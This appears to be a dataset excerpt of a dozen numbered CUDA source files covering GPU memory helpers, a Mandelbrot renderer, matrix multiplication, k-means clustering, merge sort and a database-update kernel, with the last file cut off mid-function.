serial_no
int64
1
24.2k
cuda_source
stringlengths
11
9.01M
21,401
#include "utilities.cuh" cudaError_t arrayMalloc(void*** array, int length, size_t* size) { cudaError_t cudaStatus; for (int i = 0; i < length; i++) { cudaStatus = cudaMalloc(array[i], size[i]); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!\n"); goto Error; } } Error: for (size_t i = 0; i < length; i++) { cudaFree(array[i]); } return cudaStatus; } cudaError_t arraycpyHtoD(void*** array_d, void*** array_h, int length, size_t* size) { cudaError_t cudaStatus; for (int i = 0; i < length; i++) { cudaStatus = cudaMemcpy(*array_d[i], *array_h[i], size[i], cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy HostToDevice of array %d failed!\n", i); fprintf(stderr, "Reasons for failure : %s\n", cudaGetErrorString(cudaStatus)); goto Error; } } Error: for (size_t i = 0; i < length; i++) { cudaFree(array_d[i]); } return cudaStatus; } cudaError_t arraycpyHtoD_v2(void*** array_d, void** array_h, int length, size_t* size) { cudaError_t cudaStatus; for (int i = 0; i < length; i++) { cudaStatus = cudaMemcpy(*array_d[i], array_h[i], size[i], cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy HostToDevice of array %d failed!\n", i); fprintf(stderr, "Reasons for failure : %s\n", cudaGetErrorString(cudaStatus)); goto Error; } } Error: for (size_t i = 0; i < length; i++) { cudaFree(array_d[i]); } return cudaStatus; } cudaError_t arraycpyDtoH(void*** array_h, void*** array_d, int length, size_t* size) { cudaError_t cudaStatus; for (int i = 0; i < length; i++) { cudaStatus = cudaMemcpy(*array_h[i], *array_d[i], size[i], cudaMemcpyDeviceToHost); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy DeviceToHost of array %d failed!\n", i); goto Error; } } Error: for (size_t i = 0; i < length; i++) { cudaFree(array_d[i]); } return cudaStatus; } cudaError_t arraycpyDtoH_v2(void** array_h, void*** array_d, int length, size_t* size) { cudaError_t cudaStatus; for (int i = 0; i < length; i++) { cudaStatus = cudaMemcpy(array_h[i], *array_d[i], size[i], cudaMemcpyDeviceToHost); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy DeviceToHost of array %d failed!\n", i); goto Error; } } Error: for (size_t i = 0; i < length; i++) { cudaFree(array_d[i]); } return cudaStatus; } cudaError_t oneMalloc(void** a_d, size_t size) { cudaError_t cudaStatus; cudaStatus = cudaMalloc((void**)&a_d, size ); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!\n"); } return cudaStatus; } cudaError_t onecpyHtoD(void* dev_a, void* a, size_t size) { cudaError_t cudaStatus; cudaStatus = cudaMemcpy(dev_a, a, size, cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!\n"); } return cudaStatus; } cudaError_t onecpyDtoH(void* a, void* dev_a, size_t size) { cudaError_t cudaStatus; cudaStatus = cudaMemcpy(a, dev_a, size, cudaMemcpyDeviceToHost); if (cudaStatus != cudaSuccess) { fprintf(stderr, "one cudaMemcpy DtoH failed!\n"); } return cudaStatus; } cudaError_t oneSetdevice() { cudaError_t cudaStatus; cudaStatus = cudaSetDevice(0); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaSetDevice failed! Do you have a CUDA-capable GPU installed?\n"); } return cudaStatus; } cudaError_t oneLastError() { cudaError_t cudaStatus; cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); } return cudaStatus; } // cudaDeviceSynchronize waits for the kernel to finish, and returns // any errors encountered during the launch. cudaError_t oneCudaDeviceSync() { cudaError_t cudaStatus; cudaStatus = cudaDeviceSynchronize(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus); } return cudaStatus; } using namespace std; void write_array_to_file(double* A, string filename, int M, int N) { fstream file; file.open(filename, ios::out); for (int i = 0; i < M; i++) { if(i != M-1) for (int j = 0; j < N; j++) { if (j != N - 1) file << A[i * N + j] << ' '; else file << A[i * N + j] << '\n'; } else for (int j = 0; j < N; j++) { if (j != N - 1) file << A[i * N + j] << ' '; else file << A[i * N + j]; } } } void write_array_to_file_simple(double* A, string filename, int size) { fstream file; file.open(filename, ios::out); for (int i = 0; i < size; i++) { try { file << A[i] << ' '; } catch (...) { cout << filename << " writing error at element " << i << '/' << size << endl; } } } void write_array_to_file_simple_v(vector<double>& A, string filename, int size) { fstream file; file.open(filename, ios::out); for (int i = 0; i < size; i++) { try { file << A[i] << ' '; } catch (...) { cout << filename << " writing error at element " << i << '/' << size << endl; } } }
21,402
# include <cuda.h> # include <cuda_runtime.h> # include <vector_types.h> # include <device_launch_parameters.h> # include <cstdio> # ifdef WIN32 # include <time.h> # else # include <sys/time.h> # endif __global__ void iterMandel(int niterMax, int n, int* mandel ) { int t_x, t_y, iter; float step, zr; float2 z0,c0; iter = 0; t_x = threadIdx.x+blockIdx.x*blockDim.x; t_y = threadIdx.y+blockIdx.y*blockDim.y; if ((t_x<n) && (t_y<n)) { step = 2.5f/(n-1.f); c0.x = -2.00 + step*t_x; c0.y = -1.25 + step*t_y; z0 = c0; while ((z0.x*z0.x+z0.y*z0.y < 4.f)&&(iter<niterMax)) { iter += 1; zr = z0.x*z0.x-z0.y*z0.y+c0.x; z0.y = 2.f*z0.x*z0.y+c0.y; z0.x = zr; } mandel[t_x+t_y*n] = iter; } } /* Petite routine renvoyant un instant en seconde. En faisant la différence entre deux instants, on peut mesure le temps pris par une routine. La précision est de l'ordre de la micro-seconde. */ float topChrono() { # ifdef WIN32 clock_t chrono; chrono = clock(); return ((float)chrono)/CLOCKS_PER_SEC; # else struct timeval tv; gettimeofday(&tv,NULL); return tv.tv_sec+1.E-6*tv.tv_usec; # endif } /* Calcul les coordonnees des sommets de la grille */ void compGrid(int n, float*& xh, float*& yh) { xh = new float[n]; yh = new float[n]; float step = 2.5/(n-1.); for (int i = 0; i < n; i++) { xh[i] = -2.+i*step; yh[i] = -1.25+i*step; } } /* Sauve l'ensemble de mandelbrot au format Gnuplot */ void saveMandel(int n, const float* xh, const float* yh, const int* mandel) { FILE* fich = fopen("Mandel.dat", "w"); for (int j = 0; j < n; j++) { for (int i = 0; i < n; i++) { fprintf(fich,"%f\t%f\t%d\n",yh[i], xh[j], mandel[i*n+j]); } fprintf(fich, "\n"); } fclose(fich); } int main(int nargc, char* argv[]) { float t1,t2; float *xh, *yh; int n = 1280; int maxIter = 1000; int* gmandel, *cmandel; cudaEvent_t start, stop; float time; if (nargc > 1) n = atoi(argv[1]); if (nargc > 2) maxIter = atoi(argv[2]); compGrid(n,xh,yh); cudaMalloc((void**)&gmandel, n*n*sizeof(int)); cmandel = new int[n*n]; cudaEventCreate(&start); cudaEventCreate(&stop); dim3 blockDim(16,16); dim3 gridDim((n+15)/16, (n+15)/16); cudaEventRecord( start, 0 ); iterMandel<<<gridDim,blockDim>>>(maxIter, n, gmandel); cudaMemcpy(cmandel, gmandel, n*n*sizeof(int), cudaMemcpyDeviceToHost); cudaEventRecord( stop, 0 ); cudaEventSynchronize( stop ); cudaFree(gmandel); cudaEventElapsedTime( &time, start, stop ); cudaEventDestroy( start ); cudaEventDestroy( stop ); printf("Temps de calcul du Bouddha : %f secondes\n",time/1000.); saveMandel(n,xh,yh,cmandel); delete [] cmandel; delete [] xh; delete [] yh; return EXIT_SUCCESS; };
21,403
/* \file TestExceptions.cu \author Gregory Diamos <gregory.diamos@gatech.edu> \date Tuesday November 9, 2010 \brief A CUDA assembly test for unstructured control flow mimicking exceptions. */ #include <cstdlib> const unsigned int threads = 512; const unsigned int iterations = 100; __device__ unsigned int output[threads]; __device__ unsigned int input[threads]; extern "C" __global__ void exception_in_divergent_call(unsigned int id) { goto Try_Label; Try_Label: unsigned int result = 0; if(threadIdx.x == id) { goto Function_1_Begin; } else { goto Function_2_Begin; } Function_1_Begin: if(input[threadIdx.x] != id) goto Catch_Label; result = input[threadIdx.x]; goto Function_Return; Function_2_Begin: if(input[threadIdx.x] == id) goto Catch_Label; result = threadIdx.x; goto Function_Return; Function_Return: for(unsigned int i = 0; i < iterations; ++i) { result = (result >> 1) ^ threadIdx.x; } output[threadIdx.x] = result; return; Catch_Label: output[threadIdx.x] = (unsigned int)-1; // error occurred return; } extern "C" __global__ void exception_in_loop(int iterations) { goto Try_Label; Try_Label: unsigned int result = 0; goto Function_Begin; Function_Begin: for(unsigned int i = 0; i < threadIdx.x; ++i) { if(input[i] > blockDim.x) goto Catch_Label; result += input[i]; } for(unsigned int i = 0; i < iterations; ++i) { result = (result >> 1) ^ threadIdx.x; } goto Function_Return; Function_Return: output[threadIdx.x] = result; return; Catch_Label: output[threadIdx.x] = (unsigned int)-1; // error occurred return; } extern "C" __global__ void exception_in_conditional() { goto Try_Label; Try_Label: unsigned int result = 0; goto Function_Begin; Function_Begin: if(input[threadIdx.x] > 0) { if(input[threadIdx.x] > blockDim.x) goto Catch_Label; result = input[threadIdx.x]; } for(unsigned int i = 0; i < iterations; ++i) { result = (result >> 1) + threadIdx.x; } goto Function_Return; Function_Return: output[threadIdx.x] = result; return; Catch_Label: output[threadIdx.x] = (unsigned int)-1; // error occurred return; } int main(int argc, char** argv) { unsigned int* in; srand(0); cudaGetSymbolAddress((void**)&in, "input"); unsigned int refIn[threads]; for(unsigned int i = 0; i < threads; i++) { refIn[i] = i; } cudaMemcpy(in, refIn, threads * sizeof(unsigned int), cudaMemcpyHostToDevice); exception_in_divergent_call<<<1, threads>>>(0); for(unsigned int i = 0; i < threads; i++) { refIn[i] = std::rand() % threads; } cudaMemcpy(in, refIn, threads * sizeof(unsigned int), cudaMemcpyHostToDevice); exception_in_loop<<<1, threads>>>(iterations); for(unsigned int i = 0; i < threads; i++) { refIn[i] = std::rand() & 1; } cudaMemcpy(in, refIn, threads * sizeof(unsigned int), cudaMemcpyHostToDevice); exception_in_conditional<<<1, threads>>>(); }
21,404
/* * File: Histogram * Author: Roberts Slisans * Date: 03/24/2015 16:00 * Last updated: 03/24/2014 17:32 */ #include <stdio.h> #include <assert.h> /** * KERNEL cuAdd() - Takes 2 input arrays of same size N and adds them into C. * Locations are found by computing the global index of each thread. * @return */ __global__ void cuAdd(int *a,int *b,int *c, int N) { // 1D global index int offset = blockDim.x * blockIdx.x + threadIdx.x; if(offset < N) { c[offset] = a[offset] + b[offset]; } } /** * KERNEL cuMult() - Takes two 2D matrices and multiplies them * @param a - 1st Matrix * @param b - 2nd Matrix * @param c - Result Matrix * @param wA - length of A and depth of B * @param wB - length of matrix B and C * @param hA - depth of matrix A and C */ __global__ void cuMult(int *a, int *b, int *c, int wA, int wB, int hA) { // global index int gidx = blockDim.x * blockIdx.x + threadIdx.x; // col int gidy = blockDim.y * blockIdx.y + threadIdx.y; // row if(gidx < wB && gidy < hA) { int sum = 0; for(int k=0; k<wA; k++) { // Multiply row of A by column of B sum += a[gidy*wA + k] * b[k*wB +gidx]; } c[gidy * wB + gidx] = sum; } } /** * KERNEL cuMultOpti() - Takes two 2D matrices and multiplies them optimally * @param a - 1st Matrix * @param b - 2nd Matrix * @param c - Result Matrix * @param wA - length of A and depth of B * @param wB - length of matrix B and C * @param hA - depth of matrix A and C */ __global__ void cuMultOpti( int *a, int *b, int *c, int wA, int wB, int hA) { #define blockTile 16 /* Blocksize is 16x16 */ /* Allocate shared memory */ __shared__ int aBlock[blockTile][blockTile]; __shared__ int bBlock[blockTile][blockTile]; /* Calculate global index X, Y*/ int gidx = blockDim.x * blockIdx.x + threadIdx.x; // column int gidy = blockDim.y * blockIdx.y + threadIdx.y; // row /* Assign shared memory and sync */ /* Warning, wA*gidy may be out of bounds */ aBlock[threadIdx.x][threadIdx.y] = a[gidy*wA + threadIdx.x]; bBlock[threadIdx.x][threadIdx.y] = b[threadIdx.y*wB + gidx]; /* Make sure all of the threads have cached the memory */ __syncthreads(); /* Check if global IDs are within limits */ if(gidx < wB && gidy < hA) { int sum = 0; for(int k=0; k<wA; k++) { sum += aBlock[threadIdx.y][k] * bBlock[k][threadIdx.x]; } // c [gidy][gidx] c[gidy * wB + gidx] = sum; } } /** * HOST h_MatrixMult_Naive() - Takes two 2D matrices and multiplies them naively * @param a wA.hA - 1st Matrix * @param b wB.wA - 2nd Matrix * @param c hA.wB - Result Matrix * @param wA - length of A and depth of B * @param wB - length of matrix B and C * @param hA - depth of matrix A and C */ void h_MatrixMult_Naive( int *a, int *b, int *c, int wA, int wB, int hA) { // Iterate through all rows of a for(int i=0; i<hA; i++) { // Iterate through all columns of b for(int j=0; j<wB; j++) { // Calculate all of c[i][j] products int sum = 0; for(int k=0; k<wA; k++) { sum += a[i*wA + k] * b[k*wB + j]; } assert(i*wB + j < hA*wB); // Index - row i of column j with column width of wB c[i * wB + j] = sum; } } } /** * ENTRY main() - Tests <<<>>>cuMult() kernel: Initializes memory and data on * the host, then memory on the device. Copies the data from host to device, * executes kernel with memory device pointers, copies result back to host, * displays results for error checking and frees allocated memory. * @return */ int main(int argc, char ** argv) { // width A int wA = 320; // height A int hA = 640; // width B int wB = 320; // height B int hB = wA; // value A int aValue = 1; // value B int bValue = 2; /* Fetch the test parameters */ if(argc < 6) { printf("Using default parameters: 320 640 320 1 2\n"); } else { wA = atoi(argv[1]); hA = atoi(argv[2]); wB = atoi(argv[3]); hB = wA; aValue = atoi(argv[4]); bValue = atoi(argv[5]); } /** * Neutral - both for host and device */ int wC = wB; int hC = hA; size_t size_a = sizeof(int) * wA * hA; size_t size_b = sizeof(int) * wB * hB; size_t size_c = sizeof(int) * wC * hC; // host int *a, *b, *c, *hh_c; a = (int *) malloc(size_a); b = (int *) malloc(size_b); c = (int *) malloc(size_c); /* Host test memory */ hh_c = (int *) malloc(size_c); assert(hh_c != NULL); /** * Device specific */ // device int *_a, *_b, *_c; cudaMalloc( (void **) &_a, size_a ); cudaMalloc( (void **) &_b, size_b ); cudaMalloc( (void **) &_c, size_c ); /** Neutral */ // initialize A for(int i=0; i < hA * wA; i++) { a[i] = aValue; } // initialize B for(int i=0; i < hB * wB; i++) { b[i] = bValue; } /** Device*/ // copy data to GPU cudaMemcpy(_a, a, size_a, cudaMemcpyHostToDevice); cudaMemcpy(_b, b, size_b, cudaMemcpyHostToDevice); // x : col , y: row dim3 blockSize(16,16); // (N.x + blockSize.x - 1)/blockSize.x, (N.y + blockSize.y -1)/blockSize.y) dim3 gridSize((wC+15)/16, (hC+15)/16); // kernel execution cuMult<<< gridSize, blockSize >>>(_a, _b, _c, wA, wB, hA); //cuMultOpti<<< gridSize, blockSize >>>(_a, _b, _c, wA, wB, hA); // copy data back to CPU cudaMemcpy(c, _c, size_c, cudaMemcpyDeviceToHost); // compare with cpu results /** Host*/ h_MatrixMult_Naive(a, b, hh_c, wA, wB, hA); // Check first and last memory location printf("Start: %d. Finish: %d.\n",c[2], c[wC * hC - 1]); /* Check */ // Naive check int k = 0; while(c[k] == c[k+1]) k++; printf("EQ Test: Breakpoint @ %d\n",k); // Device - Host check k = 0; while(c[k] == hh_c[k]) k++; printf("H2D Test: Breakpoint @ %d\n",k); // release resources cudaFree(_a); cudaFree(_b); cudaFree(_c); free(a); free(b); free(c); free(hh_c); return 0; }
21,405
#include "includes.h" __global__ void matrixExp(double *a, double *c, int cr, int cc){ int x = blockIdx.x * blockDim.x + threadIdx.x; // col int y = blockIdx.y * blockDim.y + threadIdx.y; // row if(x < cc && y < cr){ c[y * cc + x] = exp(a[y * cc + x]); } }
21,406
#include "includes.h" __global__ void max_gradInput(float *input, float *output, float *indices, long nrows, long ncols) { // output offset: long o = threadIdx.x + blockDim.x * blockIdx.x; if (o >= nrows) return; // input offset: long i = o * ncols; // bprop max gradient: long idx = indices[o]-1; input[i+idx] = output[o]; }
21,407
#include<iostream> #include<string> #include<malloc.h> #include<fstream> #include<sstream> #include<vector> #include<cmath> #include<cstdio> #include<stdlib.h> #include<cuda.h> #include<cuda_runtime.h> #define MAX_CLUSTER_SIZE 6 #define BLOCK_SIZE 16 using namespace std; typedef vector<double> record_t; typedef vector<record_t> data_t; long long int max_atoms=0; long long int max_energy_states=0; int k_clus,cls; double cluster_lambda=0.0; int f=0; istream& operator >>(istream& ins, record_t &record) { record.clear(); string line; getline(ins,line); stringstream ss(line); string field; while(getline(ss,field,',')) { stringstream fs(field); double d=0.0; fs>>d; record.push_back(d); } return ins; } istream& operator >> (istream& ins, data_t& data) { data.clear(); record_t record; while(ins>>record) { data.push_back(record); } return ins; } __global__ void findMeans(const float *cluster, const float *instance, int *rnk, const int num, const int clus_size, const int maxAtoms) { int i = blockIdx.x * blockDim.x + threadIdx.x; // int i = threadIdx.x; if(i<num) { float min=0.0; for(int j=0;j<maxAtoms;j++) { float d=0.0; float s=0.0; for(int k=0;k<3;k++) { d=instance[(j*5)+k+2]-cluster[((0*clus_size)+j)*maxAtoms +k]; s=s+(d*d); } s=sqrt(s); min+=s; } int cls=-1; for(int clus=0;clus<clus_size;clus++) { float val=0.0; for(int p=0;p<maxAtoms;p++) { float d=0.0; float s=0.0; for(int l=0;l<3;l++) { d=instance[((i*maxAtoms+p)*5)+l+2]-cluster[((clus*clus_size)+p)*maxAtoms +l]; s=s+(d*d); } s=sqrt(s); val+=s; } if(val<=min) { cls=clus; min=val; } } rnk[i]=cls+1; } } int main(void) { cudaError_t err=cudaSuccess; data_t data; ifstream infile("alanine.csv"); infile>>data; if(!infile.eof()) { cout<<"Error! Please check file.\n"; return 1; } infile.close(); cout<<"Number of rows in file : "<<data.size()<<endl; for(long long int i=0;i<data.size();i++) { if(i>0) { if(data[i][1]<data[i-1][1]) { max_atoms=i; break; } } } cout<<"Number of atoms : "<<max_atoms<<endl; max_energy_states=data[data.size()-1][0]; // max_energy_states=32; cout<<"Total number of conformations : "<<max_energy_states<<endl; //allocate host cluster int s = MAX_CLUSTER_SIZE*max_atoms*3; size_t sz = s*sizeof(float); float *host_cluster=(float *)malloc(sz); if(host_cluster==NULL) cout<<"Not able to allocate host cluster"<<endl; //Initializing host cluster for(int i=0;i<MAX_CLUSTER_SIZE;i++) { int clus_num=rand()%max_energy_states + 0; for(long long int ii=0;ii<max_atoms;ii++) { for(int jj=0;jj<3;jj++) { host_cluster[((i*MAX_CLUSTER_SIZE)+ii)*max_atoms+jj]=data[clus_num*max_atoms+ii][jj+2]; } } } //allocate device cluster float *d_clus = NULL; cudaMalloc((void **)&d_clus, sz); if(err!=cudaSuccess) { cout<<"Failed to allocate cluster on device!\n"; exit(EXIT_FAILURE); } //initializing device cluster cudaMemcpy(d_clus, host_cluster, sz, cudaMemcpyHostToDevice); if(err!=cudaSuccess) { cout<<"Failed to copy cluster to device\n"; exit(EXIT_FAILURE); } //allocate host instance float *host_instances; long int row=data.size(); int col=5; long int size=row*col; host_instances=new float[size]; for(long long int i=0;i<row;i++) { for(int j=0;j<col;j++) { host_instances[i*col+j]=data[i][j]; } } //allocate device instance float *device_instances; err=cudaMalloc((void **)&device_instances,size*sizeof(float)); if(err!=cudaSuccess) { cout<<"error allocating device instance"<<endl; exit(EXIT_FAILURE); } err=cudaMemcpy(device_instances, host_instances, size*sizeof(float), cudaMemcpyHostToDevice); if(err!=cudaSuccess) { cout<<"error copying device instance"<<endl; exit(EXIT_FAILURE); } int *rnk_host; int rnk[max_energy_states]; rnk_host=new int[max_energy_states]; for(long long int i=0;i<max_energy_states;i++) { rnk_host[i]=0; rnk[i]=0; } int *rnk_device; err=cudaMalloc((void **)&rnk_device,max_energy_states*sizeof(int)); if(err!=cudaSuccess) { cout<<"error allocating device rnk"<<endl; exit(EXIT_FAILURE); } err=cudaMemcpy(rnk_device, rnk_host, max_energy_states*sizeof(int), cudaMemcpyHostToDevice); if(err!=cudaSuccess) { cout<<"error allocating device instance"<<endl; exit(EXIT_FAILURE); } // dim3 dimBlock(BLOCK_SIZE,BLOCK_SIZE); int num_blocks=(max_energy_states+511)/512; //while(1) //{ findMeans<<<48,256>>>(d_clus, device_instances, rnk_device, max_energy_states, MAX_CLUSTER_SIZE, max_atoms); err=cudaMemcpy(rnk_host, rnk_device, max_energy_states*sizeof(int), cudaMemcpyDeviceToHost); if(err!=cudaSuccess) { cout<<"error allocating device rnk"<<endl; exit(EXIT_FAILURE); } //while(1) //{ //E - Step for(long long int j=0;j<max_energy_states;j++) { double min=0.0; for(long long int y=0;y<max_atoms;y++) { double d=0.0,s=0.0; for(int z=0;z<3;z++) { d=host_instances[(y*5)+z+2]-host_cluster[((0*MAX_CLUSTER_SIZE)+y)*max_atoms +z]; s=s+(d*d); } s=sqrt(s); min+=s; } cls=-1; for(int clus=0;clus<MAX_CLUSTER_SIZE;clus++) { double val=0.0; for(long long int p=0;p<max_atoms;p++) { double d=0.0,s=0.0; for(int l=0;l<3;l++) { d=data[j*max_atoms+p][l+2]-host_cluster[((clus*MAX_CLUSTER_SIZE)+p)*max_atoms +l]; s=s+(d*d); } s=sqrt(s); val+=s; } if(val<=min) { cls=clus; min=val; } } rnk[j]=cls+1; } int flag=0; for(long int i=0;i<100;i++) { if(rnk[i]!=rnk_host[i]) flag=1; cout<<rnk[i]<<"\t"<<rnk_host[i]<<endl; } if(flag==1) cout<<"Not Matching"<<endl; /* //M - Step int sizes[MAX_CLUSTER_SIZE]; for(int jj=0;jj<MAX_CLUSTER_SIZE;jj++) sizes[jj]=0; double means[MAX_CLUSTER_SIZE][max_atoms][3]; for(int jj=0;jj<MAX_CLUSTER_SIZE;jj++) { for(long long int kk=0;kk<max_atoms;kk++) { for(int ll=0;ll<3;ll++) { means[jj][kk][ll]=0; } } } for(long long int jj=0;jj<max_energy_states;jj++) { for(long long int kk=0;kk<max_atoms;kk++) { for(int ll=0;ll<3;ll++) { double d=data[jj*max_atoms+kk][ll+2]; means[rnk[jj]-1][kk][ll]+=d; sizes[rnk[jj]-1]++; } } } for(int jj=0;jj<MAX_CLUSTER_SIZE;jj++) { for(long long int kk=0;kk<max_atoms;kk++) { for(int ll=0;ll<3;ll++) { if(cluster[jj][kk][ll]!=means[jj][kk][ll]/sizes[jj]) { f=1; } if(sizes[jj]!=0) cluster[jj][kk][ll]=means[jj][kk][ll]/sizes[jj]; else cluster[jj][kk][ll]=0; } } } if(f==0) break; f=0; }*/ /*for(int i=0;i<max_energy_states;i++) { cout<<rnk_host[i]<<" "; } cout<<endl;*/ return 0; }
21,408
#include "cuda_runtime.h" #include <stdlib.h> #include <stdio.h> #include <time.h> #define N (4096*4096) #define THREADS_PER_BLOCK 512 __global__ void sumOnGpu(int *a, int *b, int *c, int n){ int index = threadIdx.x + blockIdx.x * blockDim.x; if(index < n){ c[index] = a[index] + b[index]; } } void sumOnCpu(int *a, int *b, int *c, int n){ for(int i = 0; i < n; i++){ c[i] = a[i] + b[i]; } } void randomNumbers(int *a, int n){ for(int i = 0; i < n; i++){ a[i] = rand()%100000; } } int compare(int *a, int *b, int n){ int pass = 1; for(int i = 0; i < n; i++){ if(a[i] != b[i]){ printf("Different values at a[%i] = %i and b[%i] = %i \n", i, a[i], i, b[i]); pass = 0; } } if (pass) printf("args are the same \n"); else printf("args are different \n"); return pass; } int main(){ int *a, *b, *c; int *d_a, *d_b, *d_c; int size = N * sizeof(int); a = (int*)malloc(size); b = (int*)malloc(size); c = (int*)malloc(size); cudaMalloc((void**)&d_a, size); cudaMalloc((void**)&d_b, size); cudaMalloc((void**)&d_c, size); randomNumbers(a, N); randomNumbers(b, N); cudaMemcpy(d_a, a, size, cudaMemcpyHostToDevice); cudaMemcpy(d_b, b, size, cudaMemcpyHostToDevice); clock_t timeOnGpu = clock(); sumOnGpu<<<N/THREADS_PER_BLOCK, THREADS_PER_BLOCK>>>(d_a, d_b, d_c, N); printf("time on GPU %f \n", ((double)clock() - timeOnGpu)/CLOCKS_PER_SEC); cudaMemcpy(c, d_c, size, cudaMemcpyDeviceToHost); int* c_h; c_h = (int*)malloc(size); clock_t i = clock(); sumOnCpu(a, b, c_h, N); printf("time on CPU %f \n", ((double)clock() - i)/CLOCKS_PER_SEC); compare(c, c_h, N); free(a); free(b); free(c); free(c_h); cudaFree(d_a); cudaFree(d_b); cudaFree(d_c); return 0; }
21,409
#include <thrust/device_vector.h> #include <thrust/host_vector.h> #include <thrust/random/linear_congruential_engine.h> #include <thrust/random/uniform_real_distribution.h> #include <iostream> // nvcc -std=c++14 -O3 tarefa5.cu -o t5 && ./t5 struct raw_access { __device__ __host__ double operator()(const int &i) { thrust::minstd_rand rng; thrust::uniform_real_distribution<double> dist(25, 40); rng.discard(i); return dist(rng); } }; int main() { int N = 10; thrust::device_vector<double> vetor(N); thrust::counting_iterator<int> iter(0); raw_access ra; thrust::transform(iter, iter + vetor.size(), vetor.begin(), ra); // for (auto i = vetor.begin(); i != vetor.end(); i++) // std::cout << *i << " "; // este acesso é lento! -- GPU // printf("\n"); thrust::host_vector<double> host(vetor); for (auto i = host.begin(); i != host.end(); i++) std::cout << *i << " "; // este acesso é rápido -- CPU printf("\n"); }
21,410
#include "includes.h" using namespace std; // 用宏变长参数来实现 __global__ void merge_sort(int *datas, int n){ int tid=blockDim.x*threadIdx.y+threadIdx.x; extern __shared__ int shared[]; if (tid<n) shared[tid] = datas[tid]; __syncthreads(); int cnt=1; for (int gap=2; gap<n*2; gap<<=1, cnt++){ if (tid%gap==0){ int left=tid+n*((cnt+1)%2); int mid=tid+gap/2+n*((cnt+1)%2); int right=mid; int end=tid+gap+((cnt+1)%2)*n; int full_end=(1+(cnt+1)%2)*n; int res_ind=n*(cnt%2)+tid; while((left<mid && left<full_end) || (right<end && right<full_end)){ if (!(left<mid && left<full_end)){ shared[res_ind]=shared[right]; right++; }else if (!(right<end && right<full_end)){ shared[res_ind]=shared[left]; left++; }else{ if (shared[right]> shared[left]){ shared[res_ind]=shared[left]; left++; }else{ shared[res_ind]=shared[right]; right++; } } res_ind++; } } __syncthreads(); } datas[tid]=shared[tid+ ((cnt+1)%2)*n]; }
21,411
#include <cuda.h> #include <stdio.h> #include <stdlib.h> __global__ void vecAddKernel(float *A,float * B,float *C,int n){ int i=threadIdx.x+blockDim.x+blockIdx.x; if(i<n){ C[i]=A[i]+B[i]; } } // & address * value; void vecAdd(float *h_A, float *h_B, float *h_C,int n){ int size= n * sizeof(float); float *d_A,*d_B,*d_C; cudaMalloc((void**)&d_A,size); cudaMemcpy(d_A,h_A,size,cudaMemcpyHostToDevice); cudaMalloc((void**)&d_B,size); cudaMemcpy(d_B,h_B,size,cudaMemcpyHostToDevice); cudaError_t err=cudaMalloc((void**)&d_C,size); /*if(err!=cudaSuccess){ printf("error"); exit(EXIT_FAILURE); }*/ vecAddKernel<<<ceil(n/256.0),256>>>(d_A,d_B,d_C,n); cudaMemcpy(h_C,d_C,size,cudaMemcpyDeviceToHost); /*for(i=0;i<n;i++){ h_C[i]=h_A[i]+h_B[i]; printf("%lf",h_C[i]); }*/ cudaFree(d_C); cudaFree(d_A); cudaFree(d_B); } int main(){ float *h_A,*h_B,*h_C; int n=4; h_A = (float *)malloc(n* sizeof(float)); h_B = (float *)malloc(n* sizeof(float)); h_C = (float *)malloc(n* sizeof(float)); vecAdd(h_A,h_B,h_C,n); for(int i=0;i<n;i++){ printf("%f ",h_C[i]); } free(h_A); free(h_B); free(h_C); }
21,412
#include <stdio.h> #include <cuda.h> __device__ int getnum(char *queryArray, int &i) { int ans=0; while(queryArray[i]==' ' || queryArray[i]=='\t') i++; while(queryArray[i]<=57 && queryArray[i]>=48) { ans = ans*10 + (queryArray[i]-'0'); i++; } while(queryArray[i]==' ' || queryArray[i]=='\t') i++; return ans; } __global__ void updateDB(int* dB, char* queryArray_GPU, int *queryIndices_GPU, int m, int n, int q) { int id = threadIdx.x + blockIdx.x * blockDim.x; if(id < q) { int base = queryIndices_GPU[id]; int i=base+3, j, rowno; int updval; int updcol; int colno = getnum(queryArray_GPU, i)-1; int ncomp = getnum(queryArray_GPU, i); int p = getnum(queryArray_GPU, i); queryIndices_GPU[id] = i; for(rowno = 0; rowno<m; rowno++) { if(dB[rowno*n + colno] == ncomp) { i = queryIndices_GPU[id]; for(j = 0; j<p; j++) { i+=1; updcol = getnum(queryArray_GPU, i)-1; updval = getnum(queryArray_GPU, i); if(queryArray_GPU[i]=='-') updval*=(-1); i+=2; atomicAdd(&dB[rowno*n + updcol], updval); } } } } } int main(int argc, char* argv[]) { FILE *inp, *otp; inp = fopen(argv[1], "r"); int m, n, i, j; fscanf(inp, "%d", &m); fscanf(inp, "%d", &n); int *dataBase = (int *) malloc (m*n*sizeof(int)); for(i=0;i<m*n;++i) fscanf(inp, "%d", &dataBase[i]); int *dB; cudaMalloc(&dB,n*m*sizeof(int)); cudaMemcpy(dB,dataBase,n*m*sizeof(int),cudaMemcpyHostToDevice); int q; fscanf(inp, "%d", &q); int *queryIndices_CPU = (int *) malloc (q*sizeof(int)); int *queryIndices_GPU; cudaMalloc(&queryIndices_GPU, q*sizeof(int)); char *queryArray_CPU = (char *)malloc(q*300*sizeof(char)); j=0; i=0; while(fscanf(inp, "%c", &queryArray_CPU[i]) != EOF) { if(queryArray_CPU[i] == 'U') { queryIndices_CPU[j] = i; j+=1; } i+=1; } char *queryArray_GPU; cudaMalloc(&queryArray_GPU, (i)*sizeof(char)); fclose(inp); cudaMemcpy(queryIndices_GPU,queryIndices_CPU,q*sizeof(int),cudaMemcpyHostToDevice); cudaMemcpy(queryArray_GPU,queryArray_CPU,(i)*sizeof(char),cudaMemcpyHostToDevice); updateDB<<<2, 1024>>>(dB, queryArray_GPU, queryIndices_GPU, m, n, q); cudaDeviceSynchronize(); 